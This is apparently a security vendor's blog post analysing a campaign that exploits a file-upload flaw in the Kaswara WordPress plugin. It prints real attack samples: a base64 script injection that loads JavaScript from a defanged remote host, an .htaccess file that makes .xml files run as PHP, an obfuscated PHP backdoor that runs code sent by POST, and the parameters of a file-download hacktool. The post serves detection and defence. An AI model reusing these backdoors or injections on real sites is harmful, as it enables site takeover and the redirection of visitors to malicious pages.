Vulnerable Kaswara Modern WPBakery Page Builder Addons Plugin Being Exploited in the Wild

Back on April 20th, 2021, our friends at WPScan reported a severe vulnerability on Kaswara Modern VC Addons, also known as Kaswara Modern WPBakery Page Builder Addons. It is not available anymore at Codecanyon/Envato, meaning that if you have this running, you must choose an alternative.

This vulnerability allows unauthenticated users to upload arbitrary files to the plugin’s icon directory (./wp-content/uploads/kaswara/icons). This is the first Indicator Of Compromise (IOC) our friends at WPScan shared with us in their report.

The ability to upload arbitrary files to a website gives the bad actor full control over the site, which makes it hard to define the final payload of this infection; thus, we’ll show you everything we found so far (we got a little carried away on the research, so feel free to jump to the IOC section if you don’t want to read through).

Database Injection, Fake Android apps, and other backdoors

Thanks to our friend Denis Sinegubko from Sucuri for pointing out the database injection follow up used with this attack.

Bad actors would update the ‘kaswara-customJS’ option to add an arbitrary malicious snippet of Javascript code. Here’s one example we found:

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1856,'kaswara-customJS',
'dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoXCdzY3JpcHRcJyk7CnNjcmlwdC5vbmxvYWQgPSBm
dW5jdGlvbigpIHsKfTsKc2NyaXB0LnNyYyA9IFwiaHR0cHM6Ly9ldmFkYXYubGluay9zY3JpcHQuanNcIjsKZG9jdW1lbnQu
Z2V0RWxlbWVudHNCeVRhZ05hbWUoXCdoZWFkXCcpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7','yes');

This base64 encoded string translates to:

var script = document.createElement(\'script\');
script.onload = function() {
};
script.src = \"hxxps://evadav[.]link/script.js\";
document.getElementsByTagName(\'head\')[0].appendChild(script);

And as usually happens with this type of script, it will chain load a series of other Javascript code snippets, and the final payload will be either a malvertising or an exploit kit. This is very similar to what Wordfence reported here.

In this case, the script is dying on hxxp://double-clickd[.]com/ and not loading any bad content. I found suspicious Javascript calling this site since early 2020 and people have already been blocking it since 2018.

Fake Apps uploaded to the site

The 40 Android apps found on websites we examined were fake versions of different apps, like AliPay, PayPal, Correos, DHL, and many others, which were luckily being detected by the most popular Anti-Virus vendors according to this VirusTotal analysis.

I didn’t check the intentions of the app, but a quick review on the permissions it requests can give us a glimpse of what it could do:

• android.permission.WRITE_SMS
• android.permission.RECEIVE_SMS
• android.permission.FOREGROUND_SERVICE
• android.permission.KILL_BACKGROUND_PROCESSES
• android.permission.READ_CONTACTS
• android.permission.READ_PHONE_STATE
• android.permission.READ_SMS
• android.permission.ACCESS_NETWORK_STATE
• android.permission.QUERY_ALL_PACKAGES
• android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• android.permission.INTERNET
• android.permission.SEND_SMS
• android.permission.CALL_PHONE
• android.permission.WAKE_LOCK
• android.permission.REQUEST_DELETE_PACKAGES

Those files are not being immediately uploaded using the Kaswara exploit, though. After the site is compromised the attackers will upload other tools first to fully control the site.

Uploaded files

Some backdoors and other malware were also found on websites compromised by this vulnerability. I’ll share a quick analysis of the most popular and interesting ones in this post. However, I want to first focus on the most complex one.

Redirect and Fake apps

The fake Apps I found on several compromised sites were not uploaded by exploiting the Kaswara vulnerability. They are being uploaded to the site using a multi-function hacktool, which allows the attacker to upload some remote code (by providing an URL or string), and redirect the user to a malicious site.

The file can be easily identified by the presence of this string: base64_decode('MTIz');error_reporting(0);function

Interestingly enough it randomizes everything else but this.

The malware is on a single line, which is also an interesting IOC if you are looking for this type of code anomaly.

To make it easier to understand, I decoded most parts of the code, renamed the interesting functions and beautified the code. The malware includes 6 different functions, and 5 of them are based on the values passed on the $_GET['ts'] variable. For this document, let’s consider one of the many instances I found: c.php.

/c.php?ts=kt

This does nothing and it’ll force the site to return a 500 error (later on the code).

/c.php?ts=1

Changes the $q1a flag value to true to perform a code validation and output an OK message to the attacker. 

In this case the remote site answers: {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}

/c.php?ts=sv&v=”Code”&p=40bd001563085fc35165329ea1ff5c5ecbdbbeef

Writes a file on the server with code provided by the contents of  $_GET["v"] as long as $_GET["p"] is the SHA1 checksum of 123 (remember that first IOC of base64_decode('MTIz')? this is that checksum).

/c.php?ts=tt

Writes 5 MB of “-” on the server, probably used to test if the upload function will work on the server.

/c.php?ts=dwm&h=HASH1,HASH2

When the malware receives this request it performs a test to verify if uploaded files were successfully written to the server. Their MD5 hashes must be known and are sent to $_GET['h'] variable as comma separated values.

/c.php?ts=dw&h=hash&l=URLs_as_CSV

Downloads a file from a series of third-party websites and saves it on the server naming it after the last 12 characters of the md5 of the downloaded file.

This is the function being used to upload fake apps to the server.

Here’s an example of the request to download malicious files /c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697

Redirecting access

If the kt option or no option was selected, the code proceeds to the redirect, which is achieved by requesting a JSON blob with the needed data. It then proceeds to redirect the visitor using the header function.

The response is like this: {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}

The function to execute a cURL request with the needed parameters is this one: Nothing fancy…

And it can be translated to this cURL request:

curl -X POST hxxp://papass[.]ru/click_api/v3 \
    -H 'X-Forwarded-For: 200.171.221.1' \
    -H 'Accept-Language: *' \
    -H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36' \
    -d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'

The final URL is, as far as I could test, random, but sharing the same characteristic of being a fake page for a popular service or app.

wp-content/uploads/kaswara/icons/16/javas.xml and wp-content/uploads/kaswara/icons/16/.htaccess

An XML file is not usually marked as a potential threat, but in this case, we have a specially crafted .htaccess file that changes how the webserver sees it:

Order Deny,Allow
Allow from all

<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">
    AddHandler application/x-httpd-php .xml .pdf
    AddType application/x-httpd-php .xml .pdf
    # ---
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
    # ---
    php_value engine 1
    # ---
    Order Deny,Allow
    Allow from all
</FilesMatch>

In fact, it tells Apache to understand any javas, homes, or menus files with xml, php, or pdf as a PHP file to be processed accordingly and executed. So, any of those files present in the same directory structure as this .htaccess will be suspicious.

The javas.xml file is the same as some other malicious files uploaded to the site. I found the difference is that some have one or two blank lines at the end of the file, which makes traditional hashing a little trickier.

<?php
$LnWYZK 	  	="\163"."\164" 	 ."\162\137\162\157"	 	.	 	"\164"	. 		  (		 279	 	-  			266)	 	  ; 	 	 if( !empty		 	 (	$ { 	 $LnWYZK	   	
("\137"	.	"\103\102\106" 		 	.		 "\107")}	) 	 		)  			{  	 			 $nNZph 	 =$LnWYZK		 (	 		 "\172". 		"\161". 	(4334	 	
-4329	)		   	 	)			  ; $ouQLkV  	 	= $LnWYZK		 (	 	 	"\157\156"  	.  	"\146" .		 "\162"	.		  	 (	  9680	 	-	  9616)  	 . "\137" 		
. 		"\161"   		.   		"\162\160\142\161\162" 	 ) 		  ; 			  $VNfzSD  	 	=$LnWYZK("\160\145\162"."\156\147\162\137\163\150\141\160"	
. "\147\166\142\141" 			 ); 	  	foreach	($			  { 	 	 $LnWYZK(			  "\137".	 	"\103"  	.	  		"\102" . 			 "\106"	 	. 		"\107" 	 		
)  			}	  as	$IKRDzf   		=>	$NIvHUr	  )( 	  	$nNZph  			(	   	$IKRDzf  	)  	===	 	  		 "c"	  .  (2668 - 	  	2626	 		 )   			.   		
"\145\141"   		."\71"		   .  			"\67"	."\71\145\144"	 	.	  "\71\70\62"	.  	"\143\60" 	 . 	 	 	(314406	  -51163		 )	 	 	. "\60" 			 
.	"\145" 	 . 			 "\71" 	 .		   "\145" . "\71"	  		.	"\70"	  	 .			  "\141"	  		.	 	"\66" . 		"\66"	.	"\144"		  	.    		( 	  	9786	-		 	 
9780 		) 		  		 	&&  	$QZCMY	 		 =	 	  $VNfzSD( ""  			, 	 $ouQLkV (  	$NIvHUr)   		)  	) 		 		 	 	?$QZCMY 	 () : " 		"		  	
;  	}

The malicious code is obfuscated using str_rot13 and base64 encoded strings. It also uses hexadecimal values and math operations to hide the strings a little more. The final payload is unknown since it will create a function based on the values of a POST request. However, the payload seems to be the same every time since it relies on a md5 check before creating it (c42ea979ed982c02632430e9e98a66d6 is the md5 hash).

Conclusion

Since this is an active campaign, at the time of writing this post we’re finding more and more different malware examples being dropped in the affected sites. Some are just variations of what we have here, while others are interesting enough for a deeper analysis. Look for some smaller posts coming soon to explore some of these other examples.

This illustrates the importance of having your extensions updated with the latest security fixes; if the developers don’t release fixes in a timely manner or it gets removed from the WordPress.org repository (or other marketplaces), we strongly recommend that you find a safer alternative to it.

If you are concerned about malware and vulnerability for your site, check out Jetpack’s security features. Jetpack Security provides easy‑to‑use, comprehensive WordPress site security including backups, malware scanning, and spam protection.

Indicators of Compromise

Here you find the complete list of all IOCs we identified:

Fioravante Souza